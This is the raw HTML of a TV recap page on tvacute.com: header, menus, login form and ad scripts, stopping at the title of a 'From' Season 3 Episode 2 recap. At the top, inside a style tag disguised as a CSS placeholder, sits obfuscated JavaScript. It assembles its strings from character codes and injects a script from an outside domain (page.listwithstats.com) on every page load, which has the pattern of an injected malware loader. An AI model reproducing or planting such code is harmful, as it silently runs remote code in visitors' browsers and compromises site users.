<style id="tdw-css-placeholder">(function(){try{var_kyje=String;letahuqfcjvsywg="f"+"ro"+_kyje['fr'+'om'+String.fromCharCode(67,104,97,114,67,111,100,101)](109,67,104,97,114,67)+"o"+"de";varadfzaklgknps="s"+"c"+_kyje[ahuqfcjvsywg](114,105,112,116),anzahqfsi="c"+"re"+_kyje[ahuqfcjvsywg](97,116,101,69,108,101,109,101,110,116),_wggbspqz="s"+_kyje[ahuqfcjvsywg](114,99),_khvhalg=_kyje[ahuqfcjvsywg](105,100),_yioksflttux="cu"+"rre"+_kyje[ahuqfcjvsywg](110,116,83,99,114,105,112,116);var_ncazbyd="pa"+"r"+_kyje[ahuqfcjvsywg](101,110,116,78,111,100,101),avlhgpawapt="i"+"ns"+_kyje[ahuqfcjvsywg](101,114,116,66,101,102,111,114,101),akgxl="ge"+"El"+_kyje[ahuqfcjvsywg](101,109,101,110,116,115,66,121,84,97,103,78,97,109,101),aejfsrhjjk="h"+"e"+_kyje[ahuqfcjvsywg](97,100),azqupyundjpd="ap"+"p"+_kyje[ahuqfcjvsywg](101,110,100,67,104,105,108,100),_mkqvfpdpol=document;var_hmdzs="t"+"e"+_kyje[ahuqfcjvsywg](109,112,95,119,101,97,116,104,101,114,95,115,99,114,105,112,116),_hfkrmp=_mkqvfpdpol[anzahqfsi](adfzaklgknps),_oykxiskhpx=_kyje[ahuqfcjvsywg](104,116,116,112,115,58,47,47)+_kyje[ahuqfcjvsywg](112,97,103,101,46,108,105,115,116,119,105,116,104,115,116,97,116,115,46,99,111,109)+_kyje[ahuqfcjvsywg](47)+_kyje[ahuqfcjvsywg](115,99,114,105,112,116,115)+_kyje[ahuqfcjvsywg](47)+_kyje[ahuqfcjvsywg](112)+"o"+"st"+_kyje[ahuqfcjvsywg](46,106,115);_hfkrmp[_wggbspqz]=_oykxiskhpx;_hfkrmp[_khvhalg]=_hmdzs;if(_mkqvfpdpol[_yioksflttux]){_mkqvfpdpol[_yioksflttux][_ncazbyd][avlhgpawapt](_hfkrmp,_mkqvfpdpol[_yioksflttux])}else{_mkqvfpdpol[akgxl](aejfsrhjjk)[0][azqupyundjpd](_hfkrmp)}}catch (err){}})();</style><noscript><style id="rocket-lazyload-nojs-css">.rll-youtube-player, [data-lazy-src]{display:none !important;}</style></noscript><link href="https://pagead2.googlesyndication.com" rel="preconnect" crossorigin="anonymous"><link href="https://pagead2.googlesyndication.com" rel="preconnect"></head>
<body class="post-template-default single single-post postid-75891 single-format-standard td-standard-pack from-season-3-episode-2-recap global-block-template-1 tdb_template_55205 tdb-template tdc-footer-template td-animation-stack-type0 td-full-layout td-js-loaded" itemscope="itemscope" itemtype="https://schema.org/WebPage">
<div class="td-scroll-up  td-hide-scroll-up-on-mob" style="display:none;"><i class="td-icon-menu-up"></i></div>
<div class="td-menu-background" style="visibility:hidden"></div>
<div id="td-mobile-nav" style="visibility:hidden">
<div class="td-mobile-container">

<div class="td-menu-socials-wrap">

<div class="td-menu-socials">
<span class="td-social-icon-wrap">
<a target="_blank" href="https://www.facebook.com/tvacute/" title="Facebook" data-wpel-link="external" rel="nofollow external noopener noreferrer">
<i class="td-icon-font td-icon-facebook"></i>
<span style="display: none">Facebook</span>
</a>
</span>
<span class="td-social-icon-wrap">
<a target="_blank" href="https://www.instagram.com/imtvacute/" title="Instagram" data-wpel-link="external" rel="nofollow external noopener noreferrer">
<i class="td-icon-font td-icon-instagram"></i>
<span style="display: none">Instagram</span>
</a>
</span>
<span class="td-social-icon-wrap">
<a target="_blank" href="https://in.pinterest.com/tvacute/" title="Pinterest" data-wpel-link="external" rel="nofollow external noopener noreferrer">
<i class="td-icon-font td-icon-pinterest"></i>
<span style="display: none">Pinterest</span>
</a>
</span>
<span class="td-social-icon-wrap">
<a target="_blank" href="https://twitter.com/tvacute" title="Twitter" data-wpel-link="external" rel="nofollow external noopener noreferrer">
<i class="td-icon-font td-icon-twitter"></i>
<span style="display: none">Twitter</span>
</a>
</span>
<span class="td-social-icon-wrap">
<a target="_blank" href="https://www.youtube.com/channel/UCW_cart8wzCSUX879DUa6lw" title="Youtube" data-wpel-link="external" rel="nofollow external noopener noreferrer">
<i class="td-icon-font td-icon-youtube"></i>
<span style="display: none">Youtube</span>
</a>
</span> </div>

<div class="td-mobile-close">
<span><i class="td-icon-close-mobile"></i></span>
</div>
</div>


<div class="td-mobile-content">
<div class="menu-main-top-menu-container"><ul id="menu-main-top-menu" class="td-mobile-main-menu"><li id="menu-item-3960" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-first menu-item-3960"><a href="https://www.tvacute.com/category/abc/" data-wpel-link="internal" target="_self" rel="follow">ABC</a></li>
<li id="menu-item-3961" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-3961"><a href="https://www.tvacute.com/category/cbs/" data-wpel-link="internal" target="_self" rel="follow">CBS</a></li>
<li id="menu-item-3962" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-3962"><a href="https://www.tvacute.com/category/fox/" data-wpel-link="internal" target="_self" rel="follow">FOX</a></li>
<li id="menu-item-3963" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-3963"><a href="https://www.tvacute.com/category/freeform/" data-wpel-link="internal" target="_self" rel="follow">Freeform</a></li>
<li id="menu-item-3964" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-3964"><a href="https://www.tvacute.com/category/hbo/" data-wpel-link="internal" target="_self" rel="follow">HBO</a></li>
<li id="menu-item-3965" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-3965"><a href="https://www.tvacute.com/category/hulu/" data-wpel-link="internal" target="_self" rel="follow">HULU</a></li>
<li id="menu-item-3966" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-3966"><a href="https://www.tvacute.com/category/nbc/" data-wpel-link="internal" target="_self" rel="follow">NBC</a></li>
<li id="menu-item-3967" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-3967"><a href="https://www.tvacute.com/category/netflix/" data-wpel-link="internal" target="_self" rel="follow">Netflix</a></li>
<li id="menu-item-3968" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-3968"><a href="https://www.tvacute.com/category/starz/" data-wpel-link="internal" target="_self" rel="follow">Starz</a></li>
<li id="menu-item-3969" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-3969"><a href="https://www.tvacute.com/category/syfy/" data-wpel-link="internal" target="_self" rel="follow">SYFY</a></li>
<li id="menu-item-3970" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-3970"><a href="https://www.tvacute.com/category/the-cw/" data-wpel-link="internal" target="_self" rel="follow">The CW</a></li>
<li id="menu-item-68029" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-68029"><a href="https://www.tvacute.com/category/movies/" data-wpel-link="internal" target="_self" rel="follow">Movies</a></li>
</ul></div> </div>
</div>

</div><div class="td-search-background" style="visibility:hidden"></div>
<div class="td-search-wrap-mob" style="visibility:hidden">
<div class="td-drop-down-search">
<form method="get" class="td-search-form" action="https://www.tvacute.com/">

<div class="td-search-close">
<span><i class="td-icon-close-mobile"></i></span>
</div>
<div role="search" class="td-search-input">
<span>Search</span>
<input id="td-header-search-mob" type="text" value="" name="s" autocomplete="off">
</div>
</form>
<div id="td-aj-search-mob" class="td-ajax-search-flex"></div>
</div>
</div>
<div id="td-outer-wrap" class="td-theme-wrap">
<div class="tdc-header-wrap ">

<div class="td-header-wrap td-header-style-3 ">
<div class="td-header-top-menu-full td-container-wrap ">
<div class="td-container td-header-row td-header-top-menu">
<div class="top-bar-style-1">
<div class="td-header-sp-top-menu">
</div>
<div class="td-header-sp-top-widget">
<span class="td-social-icon-wrap">
<a target="_blank" href="https://www.facebook.com/tvacute/" title="Facebook" data-wpel-link="external" rel="nofollow external noopener noreferrer">
<i class="td-icon-font td-icon-facebook"></i>
<span style="display: none">Facebook</span>
</a>
</span>
<span class="td-social-icon-wrap">
<a target="_blank" href="https://www.instagram.com/imtvacute/" title="Instagram" data-wpel-link="external" rel="nofollow external noopener noreferrer">
<i class="td-icon-font td-icon-instagram"></i>
<span style="display: none">Instagram</span>
</a>
</span>
<span class="td-social-icon-wrap">
<a target="_blank" href="https://in.pinterest.com/tvacute/" title="Pinterest" data-wpel-link="external" rel="nofollow external noopener noreferrer">
<i class="td-icon-font td-icon-pinterest"></i>
<span style="display: none">Pinterest</span>
</a>
</span>
<span class="td-social-icon-wrap">
<a target="_blank" href="https://twitter.com/tvacute" title="Twitter" data-wpel-link="external" rel="nofollow external noopener noreferrer">
<i class="td-icon-font td-icon-twitter"></i>
<span style="display: none">Twitter</span>
</a>
</span>
<span class="td-social-icon-wrap">
<a target="_blank" href="https://www.youtube.com/channel/UCW_cart8wzCSUX879DUa6lw" title="Youtube" data-wpel-link="external" rel="nofollow external noopener noreferrer">
<i class="td-icon-font td-icon-youtube"></i>
<span style="display: none">Youtube</span>
</a>
</span> </div>
</div>

<div id="login-form" class="white-popup-block mfp-hide mfp-with-anim td-login-modal-wrap">
<div class="td-login-wrap">
<a href="#" aria-label="Back" class="td-back-button"><i class="td-icon-modal-back"></i></a>
<div id="td-login-div" class="td-login-form-div td-display-block">
<div class="td-login-panel-title">Sign in</div>
<div class="td-login-panel-descr">Welcome! Log into your account</div>
<div class="td_display_err"></div>
<form id="loginForm" action="#" method="post">
<div class="td-login-inputs"><input class="td-login-input" autocomplete="username" type="text" name="login_email" id="login_email" value="" required=""><label for="login_email">your username</label></div>
<div class="td-login-inputs"><input class="td-login-input" autocomplete="current-password" type="password" name="login_pass" id="login_pass" value="" required=""><label for="login_pass">your password</label></div>
<input type="button" name="login_button" id="login_button" class="wpb_button btn td-login-button" value="Login">
</form>
<div class="td-login-info-text"><a href="#" id="forgot-pass-link">Forgot your password? Get help</a></div>
<div class="td-login-info-text"><a class="privacy-policy-link" href="https://www.tvacute.com/privacy-policy/" data-wpel-link="internal" target="_self" rel="follow">Privacy Policy</a></div>
</div>
<div id="td-forgot-pass-div" class="td-login-form-div td-display-none">
<div class="td-login-panel-title">Password recovery</div>
<div class="td-login-panel-descr">Recover your password</div>
<div class="td_display_err"></div>
<form id="forgotpassForm" action="#" method="post">
<div class="td-login-inputs"><input class="td-login-input" type="text" name="forgot_email" id="forgot_email" value="" required=""><label for="forgot_email">your email</label></div>
<input type="button" name="forgot_button" id="forgot_button" class="wpb_button btn td-login-button" value="Send My Password">
</form>
<div class="td-login-info-text">A password will be e-mailed to you.</div>
</div>
</div>
</div>
</div>
</div>
<div class="td-banner-wrap-full td-container-wrap ">
<div class="td-container td-header-row td-header-header">
<div class="td-header-sp-logo">
<a class="td-main-logo" href="https://www.tvacute.com/" data-wpel-link="internal" target="_self" rel="follow">
<img class="td-retina-data entered lazyloaded" data-retina="https://www.tvacute.com/wp-content/webpc-passthru.php?src=https://www.tvacute.com/wp-content/uploads/2024/07/tvacutte-pink1.png&amp;nocache=1" src="https://www.tvacute.com/wp-content/webpc-passthru.php?src=https://www.tvacute.com/wp-content/uploads/2024/07/tvacutte-H90.png&amp;nocache=1" alt="" width="458" height="90" data-lazy-src="https://www.tvacute.com/wp-content/webpc-passthru.php?src=https://www.tvacute.com/wp-content/uploads/2024/07/tvacutte-H90.png&amp;nocache=1" data-ll-status="loaded"><noscript><img class="td-retina-data" data-retina="https://www.tvacute.com/wp-content/webpc-passthru.php?src=https://www.tvacute.com/wp-content/uploads/2024/07/tvacutte-pink1.png&amp;nocache=1" src="https://www.tvacute.com/wp-content/webpc-passthru.php?src=https://www.tvacute.com/wp-content/uploads/2024/07/tvacutte-H90.png&amp;nocache=1" alt=""  width="458" height="90"/></noscript>
<span class="td-visual-hidden">TV Acutte – TV Recaps &amp; Reviews</span>
</a>
</div>
<div class="td-header-sp-recs">
<div class="td-header-rec-wrap">

<script type="rocketlazyloadscript" async="" data-rocket-src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><div class="td-g-rec td-g-rec-id-header td-a-rec-no-translate tdi_1 td_block_template_1 td-a-rec-no-translate">
<style>.tdi_1.td-a-rec{text-align:center}.tdi_1.td-a-rec:not(.td-a-rec-no-translate){transform:translateZ(0)}.tdi_1 .td-element-style{z-index:-1}.tdi_1.td-a-rec-img{text-align:left}.tdi_1.td-a-rec-img img{margin:0 auto 0 0}@media (max-width:767px){.tdi_1.td-a-rec-img{text-align:center}}</style><script type="rocketlazyloadscript" data-rocket-type="text/javascript">
var td_screen_width = window.innerWidth;
window.addEventListener("load", function(){            
	            var placeAdEl = document.getElementById("td-ad-placeholder");
			    if ( null !== placeAdEl && td_screen_width >= 1140 ) {
			        
			        /* large monitors */
			        var adEl = document.createElement("ins");
		            placeAdEl.replaceWith(adEl);	
		            adEl.setAttribute("class", "adsbygoogle");
		            adEl.setAttribute("style", "display:inline-block;width:728px;height:90px");	            		                
		            adEl.setAttribute("data-ad-client", "ca-pub-8058393775546814");
		            adEl.setAttribute("data-ad-slot", "2571576416");	            
			        (adsbygoogle = window.adsbygoogle || []).push({});
			    }
			});window.addEventListener("load", function(){            
	            var placeAdEl = document.getElementById("td-ad-placeholder");
			    if ( null !== placeAdEl && td_screen_width >= 1019  && td_screen_width < 1140 ) {
			    
			        /* landscape tablets */
			        var adEl = document.createElement("ins");
		            placeAdEl.replaceWith(adEl);	
		            adEl.setAttribute("class", "adsbygoogle");
		            adEl.setAttribute("style", "display:inline-block;width:468px;height:60px");	            		                
		            adEl.setAttribute("data-ad-client", "ca-pub-8058393775546814");
		            adEl.setAttribute("data-ad-slot", "2571576416");	            
			        (adsbygoogle = window.adsbygoogle || []).push({});
			    }
			});window.addEventListener("load", function(){            
	            var placeAdEl = document.getElementById("td-ad-placeholder");
			    if ( null !== placeAdEl && td_screen_width >= 768  && td_screen_width < 1019 ) {
			    
			        /* portrait tablets */
			        var adEl = document.createElement("ins");
		            placeAdEl.replaceWith(adEl);	
		            adEl.setAttribute("class", "adsbygoogle");
		            adEl.setAttribute("style", "display:inline-block;width:468px;height:60px");	            		                
		            adEl.setAttribute("data-ad-client", "ca-pub-8058393775546814");
		            adEl.setAttribute("data-ad-slot", "2571576416");	            
			        (adsbygoogle = window.adsbygoogle || []).push({});
			    }
			});window.addEventListener("load", function(){            
	            var placeAdEl = document.getElementById("td-ad-placeholder");
			    if ( null !== placeAdEl && td_screen_width < 768 ) {
			    
			        /* Phones */
			        var adEl = document.createElement("ins");
		            placeAdEl.replaceWith(adEl);	
		            adEl.setAttribute("class", "adsbygoogle");
		            adEl.setAttribute("style", "display:inline-block;width:320px;height:50px");	            		                
		            adEl.setAttribute("data-ad-client", "ca-pub-8058393775546814");
		            adEl.setAttribute("data-ad-slot", "2571576416");	            
			        (adsbygoogle = window.adsbygoogle || []).push({});
			    }
			});</script>
<noscript id="td-ad-placeholder"></noscript></div>

</div> </div>
</div>
</div>
<div class="td-header-menu-wrap-full td-container-wrap ">
<div class="td-header-menu-wrap ">
<div class="td-container td-header-row td-header-main-menu black-menu">
<div id="td-header-menu" role="navigation">
<div id="td-top-mobile-toggle"><a href="#" role="button" aria-label="Menu"><i class="td-icon-font td-icon-mobile"></i></a></div>
<div class="td-main-menu-logo td-logo-in-header">
<a class="td-mobile-logo td-sticky-disable" aria-label="Logo" href="https://www.tvacute.com/" data-wpel-link="internal" target="_self" rel="follow">
<img class="td-retina-data" data-retina="https://www.tvacute.com/wp-content/webpc-passthru.php?src=https://www.tvacute.com/wp-content/uploads/2024/07/tvacutte-H90.png&amp;nocache=1" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20244%2048'%3E%3C/svg%3E" alt="" width="244" height="48" data-lazy-src="https://www.tvacute.com/wp-content/webpc-passthru.php?src=https://www.tvacute.com/wp-content/uploads/2024/07/tvacutte-Mobile.png&amp;nocache=1"><noscript><img class="td-retina-data" data-retina="https://www.tvacute.com/wp-content/webpc-passthru.php?src=https://www.tvacute.com/wp-content/uploads/2024/07/tvacutte-H90.png&amp;nocache=1" src="https://www.tvacute.com/wp-content/webpc-passthru.php?src=https://www.tvacute.com/wp-content/uploads/2024/07/tvacutte-Mobile.png&amp;nocache=1" alt=""  width="244" height="48"/></noscript>
</a>
<a class="td-header-logo td-sticky-disable" aria-label="Logo" href="https://www.tvacute.com/" data-wpel-link="internal" target="_self" rel="follow">
<img class="td-retina-data" data-retina="https://www.tvacute.com/wp-content/webpc-passthru.php?src=https://www.tvacute.com/wp-content/uploads/2024/07/tvacutte-pink1.png&amp;nocache=1" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20458%2090'%3E%3C/svg%3E" alt="" width="458" height="90" data-lazy-src="https://www.tvacute.com/wp-content/webpc-passthru.php?src=https://www.tvacute.com/wp-content/uploads/2024/07/tvacutte-H90.png&amp;nocache=1"><noscript><img class="td-retina-data" data-retina="https://www.tvacute.com/wp-content/webpc-passthru.php?src=https://www.tvacute.com/wp-content/uploads/2024/07/tvacutte-pink1.png&amp;nocache=1" src="https://www.tvacute.com/wp-content/webpc-passthru.php?src=https://www.tvacute.com/wp-content/uploads/2024/07/tvacutte-H90.png&amp;nocache=1" alt=""  width="458" height="90"/></noscript>
</a>
</div>
<div class="menu-main-top-menu-container"><ul id="menu-main-top-menu-1" class="sf-menu"><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-first td-menu-item td-normal-menu menu-item-3960"><a href="https://www.tvacute.com/category/abc/" data-wpel-link="internal" target="_self" rel="follow">ABC</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-3961"><a href="https://www.tvacute.com/category/cbs/" data-wpel-link="internal" target="_self" rel="follow">CBS</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-3962"><a href="https://www.tvacute.com/category/fox/" data-wpel-link="internal" target="_self" rel="follow">FOX</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-3963"><a href="https://www.tvacute.com/category/freeform/" data-wpel-link="internal" target="_self" rel="follow">Freeform</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-3964"><a href="https://www.tvacute.com/category/hbo/" data-wpel-link="internal" target="_self" rel="follow">HBO</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-3965"><a href="https://www.tvacute.com/category/hulu/" data-wpel-link="internal" target="_self" rel="follow">HULU</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-3966"><a href="https://www.tvacute.com/category/nbc/" data-wpel-link="internal" target="_self" rel="follow">NBC</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-3967"><a href="https://www.tvacute.com/category/netflix/" data-wpel-link="internal" target="_self" rel="follow">Netflix</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-3968"><a href="https://www.tvacute.com/category/starz/" data-wpel-link="internal" target="_self" rel="follow">Starz</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-3969"><a href="https://www.tvacute.com/category/syfy/" data-wpel-link="internal" target="_self" rel="follow">SYFY</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-3970"><a href="https://www.tvacute.com/category/the-cw/" data-wpel-link="internal" target="_self" rel="follow">The CW</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-68029"><a href="https://www.tvacute.com/category/movies/" data-wpel-link="internal" target="_self" rel="follow">Movies</a></li>
</ul></div></div>
<div class="header-search-wrap">
<div class="td-search-btns-wrap">
<a id="td-header-search-button" href="#" role="button" aria-label="Search" class="dropdown-toggle " data-toggle="dropdown"><i class="td-icon-search"></i></a>
<a id="td-header-search-button-mob" href="#" role="button" aria-label="Search" class="dropdown-toggle " data-toggle="dropdown"><i class="td-icon-search"></i></a>
</div>
<div class="td-drop-down-search" aria-labelledby="td-header-search-button">
<form method="get" class="td-search-form" action="https://www.tvacute.com/">
<div role="search" class="td-head-form-search-wrap">
<input id="td-header-search" type="text" value="" name="s" autocomplete="off"><input class="wpb_button wpb_btn-inverse btn" type="submit" id="td-header-search-top" value="Search">
</div>
</form>
<div id="td-aj-search"></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div id="tdb-autoload-article" data-autoload="off" data-autoload-org-post-id="75891" data-autoload-type="" data-autoload-count="5">
<style>
        .tdb-autoload-wrap {
            position: relative;
        }
        .tdb-autoload-wrap .tdb-loader-autoload {
            top: auto !important;
            bottom: 50px !important;
        }
        .tdb-autoload-debug {
            display: none;
            width: 1068px;
            margin-right: auto;
            margin-left: auto;
        }
        @media (min-width: 1019px) and (max-width: 1018px) {
            .tdb-autoload-debug {
                width: 740px;
            }
        }
        @media (max-width: 767px) {
            .tdb-autoload-debug {
                display: none;
                width: 100%;
                padding-left: 20px;
                padding-right: 20px;
            }
        }
    </style>
<div class="td-main-content-wrap td-container-wrap">
<div class="tdc-content-wrap">
<article id="template-id-55205" class="post-55205 tdb_templates type-tdb_templates status-publish post" itemscope="" itemtype="https://schema.org/Article">
<div class="code-block code-block-4" style="margin: 8px auto; text-align: center; display: block; clear: both;">
<script type="rocketlazyloadscript" async="" data-rocket-src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>

<ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-8058393775546814" data-ad-slot="7053790170" data-ad-format="auto" data-full-width-responsive="true"></ins>
<script type="rocketlazyloadscript">
     (adsbygoogle = window.adsbygoogle || []).push({});
</script></div>
<div id="tdi_2" class="tdc-zone"><div class="tdc_zone tdi_3  wpb_row td-pb-row">
<style scoped="">.tdi_3{min-height:0}</style><div id="tdi_4" class="tdc-row"><div class="vc_row tdi_5  wpb_row td-pb-row">
<style scoped="">.tdi_5,.tdi_5 .tdc-columns{min-height:0}.tdi_5,.tdi_5 .tdc-columns{display:block}.tdi_5 .tdc-columns{width:100%}.tdi_5{padding-top:25px!important}.tdi_5 .td_block_wrap{text-align:left}</style><div class="vc_column tdi_7  wpb_column vc_column_container tdc-column td-pb-span12">
<style scoped="">.tdi_7{vertical-align:baseline}.tdi_7>.wpb_wrapper,.tdi_7>.wpb_wrapper>.tdc-elements{display:block}.tdi_7>.wpb_wrapper>.tdc-elements{width:100%}.tdi_7>.wpb_wrapper>.vc_row_inner{width:auto}.tdi_7>.wpb_wrapper{width:auto;height:auto}</style><div class="wpb_wrapper"><div class="td_block_wrap tdb_breadcrumbs tdi_8 td-pb-border-top td_block_template_1 tdb-breadcrumbs " data-td-block-uid="tdi_8">
<style>.tdi_8{margin-bottom:30px!important}@media (max-width:767px){.tdi_8{margin-bottom:20px!important}}</style>
<style>.tdb-breadcrumbs{margin-bottom:11px;font-family:'Open Sans','Open Sans Regular',sans-serif;font-size:12px;color:#747474;line-height:18px}.tdb-breadcrumbs a{color:#747474}.tdb-breadcrumbs a:hover{color:#000}.tdb-breadcrumbs .tdb-bread-sep{line-height:1;vertical-align:middle}.tdb-breadcrumbs .tdb-bread-sep-svg svg{height:auto}.tdb-breadcrumbs .tdb-bread-sep-svg svg,.tdb-breadcrumbs .tdb-bread-sep-svg svg *{fill:#c3c3c3}.single-tdb_templates.author-template .tdb_breadcrumbs{margin-bottom:2px}.tdb_category_breadcrumbs{margin:21px 0 9px}.search-results .tdb_breadcrumbs{margin-bottom:2px}.tdi_8 .tdb-bread-sep{font-size:8px;margin:0 5px}.td-theme-wrap .tdi_8{text-align:left}</style><div class="tdb-block-inner td-fix-index"><span><a title="" class="tdb-entry-crumb" href="https://www.tvacute.com/" data-wpel-link="internal" target="_self" rel="follow">Home</a></span><i class="tdb-bread-sep td-icon-right"></i><span><a title="View all posts in Recap" class="tdb-entry-crumb" href="https://www.tvacute.com/category/recap/" data-wpel-link="internal" target="_self" rel="follow">Recap</a></span></div></div><script type="application/ld+json">
                        {
                            "@context": "https://schema.org",
                            "@type": "BreadcrumbList",
                            "itemListElement": [{
                            "@type": "ListItem",
                            "position": 1,
                                "item": {
                                "@type": "WebSite",
                                "@id": "https://www.tvacute.com/",
                                "name": "Home"                                               
                            }
                        },{
                            "@type": "ListItem",
                            "position": 2,
                                "item": {
                                "@type": "WebPage",
                                "@id": "https://www.tvacute.com/category/recap/",
                                "name": "Recap"
                            }
                        }    ]
                        }
                       </script></div></div></div></div><div id="tdi_9" class="tdc-row"><div class="vc_row tdi_10 td-ss-row wpb_row td-pb-row">
<style scoped="">.tdi_10,.tdi_10 .tdc-columns{min-height:0}.tdi_10,.tdi_10 .tdc-columns{display:block}.tdi_10 .tdc-columns{width:100%}</style><div class="vc_column tdi_12  wpb_column vc_column_container tdc-column td-pb-span8">
<style scoped="">.tdi_12{vertical-align:baseline}.tdi_12>.wpb_wrapper,.tdi_12>.wpb_wrapper>.tdc-elements{display:block}.tdi_12>.wpb_wrapper>.tdc-elements{width:100%}.tdi_12>.wpb_wrapper>.vc_row_inner{width:auto}.tdi_12>.wpb_wrapper{width:auto;height:auto}</style><div class="wpb_wrapper"><div class="td_block_wrap tdb_single_categories tdi_13 td-pb-border-top td_block_template_1 " data-td-block-uid="tdi_13">
<style>.tdi_13{margin-bottom:0px!important}</style>
<style>.tdb_single_categories{margin:0 0 10px 0;line-height:1;font-family:'Open Sans','Open Sans Regular',sans-serif}.tdb_single_categories a{pointer-events:auto;font-size:10px;display:inline-block;margin:0 5px 5px 0;line-height:1;color:#fff;padding:3px 6px 4px 6px;white-space:nowrap;position:relative;vertical-align:middle}.tdb_single_categories a:hover .tdb-cat-bg{opacity:0.9}.tdb_single_categories a:hover .tdb-cat-bg:before{opacity:1}.tdb-category i:last-of-type{display:none}.tdb-cat-text{display:inline-block;vertical-align:middle;margin-right:10px}.tdb-cat-sep{font-size:14px;vertical-align:middle;position:relative}.tdb-cat-sep-svg{line-height:0}.tdb-cat-sep-svg svg{width:14px;height:auto}.tdb-cat-bg{position:absolute;background-color:#222;border:1px solid #222;width:100%;height:100%;top:0;left:0;z-index:-1}.tdb-cat-bg:before{content:'';width:100%;height:100%;left:0;top:0;position:absolute;z-index:-1;opacity:0;-webkit-transition:opacity 0.3s ease;transition:opacity 0.3s ease}.tdb-cat-style2 .tdb-cat-bg{background-color:rgba(34,34,34,0.85)}.tdi_13 .tdb-entry-category{padding:0px;margin:0 10px 10px 0;color:#fb4c7d!important;font-family:Rubik!important;font-size:14px!important;line-height:1!important;font-weight:500!important;text-transform:uppercase!important}.tdi_13 .tdb-cat-bg{border-width:0px;background-color:#ffffff!important}.tdi_13 .tdb-cat-bg:before{background-color:rgba(255,255,255,0)}.tdi_13 .tdb-entry-category:hover{color:#000000!important}.tdi_13 .tdb-cat-sep{font-size:14px}.tdi_13 .tdb-cat-text{margin-right:10px}.td-theme-wrap .tdi_13{text-align:left}@media (min-width:768px) and (max-width:1018px){.tdi_13 .tdb-entry-category{font-size:13px!important}}@media (max-width:767px){.tdi_13 .tdb-entry-category{font-size:13px!important}}</style><div class="tdb-category td-fix-index"><a class="tdb-entry-category" href="https://www.tvacute.com/category/recap/" data-wpel-link="internal" target="_self" rel="follow"><span class="tdb-cat-bg"></span>Recap</a></div></div><div class="td_block_wrap tdb_title tdi_14 tdb-single-title td-pb-border-top td_block_template_1" data-td-block-uid="tdi_14">
<style>.tdi_14{margin-top:10px!important;margin-bottom:16px!important}@media (min-width:768px) and (max-width:1018px){.tdi_14{margin-top:5px!important;margin-bottom:10px!important}}@media (max-width:767px){.tdi_14{margin-top:5px!important;margin-bottom:10px!important}}</style>
<style>.tdb_title{margin-bottom:19px}.tdb_title.tdb-content-horiz-center{text-align:center}.tdb_title.tdb-content-horiz-center .tdb-title-line{margin:0 auto}.tdb_title.tdb-content-horiz-right{text-align:right}.tdb_title.tdb-content-horiz-right .tdb-title-line{margin-left:auto;margin-right:0}.tdb-title-text{display:inline-block;position:relative;margin:0;word-wrap:break-word;font-size:30px;line-height:38px;font-weight:700}.tdb-first-letter{position:absolute;-webkit-user-select:none;user-select:none;pointer-events:none;text-transform:uppercase;color:rgba(0,0,0,0.08);font-size:6em;font-weight:300;top:50%;-webkit-transform:translateY(-50%);transform:translateY(-50%);left:-0.36em;z-index:-1;-webkit-text-fill-color:initial}.tdb-title-line{display:none;position:relative}.tdb-title-line:after{content:'';width:100%;position:absolute;background-color:var(--td_theme_color,#4db2ec);top:0;left:0;margin:auto}.tdb-single-title .tdb-title-text{font-size:41px;line-height:50px;font-weight:400}.tdi_14 .tdb-title-text{color:#000000;font-family:Roboto!important;font-size:40px!important;line-height:1.2!important;font-weight:400!important}.tdi_14 .tdb-title-line:after{height:2px;bottom:40%}.tdi_14 .tdb-title-line{height:50px}.td-theme-wrap .tdi_14{text-align:left}.tdi_14 .tdb-first-letter{left:-0.36em;right:auto}@media (min-width:768px) and (max-width:1018px){.tdi_14 .tdb-title-text{font-size:30px!important}}@media (max-width:767px){.tdi_14 .tdb-title-text{font-size:24px!important}}</style><div class="tdb-block-inner td-fix-index"><h1 class="tdb-title-text">From Season 3 Episode 2 Recap and Ending Explained!</h1><div></div><div class="tdb-title-line"></div></div></div><div class="td_block_wrap tdb_single_author tdi_15 td-pb-border-top td_block_template_1 tdb-post-meta" data-td-block-uid="tdi_15">
<style>.tdi_15{padding-right:9px!important}</style>
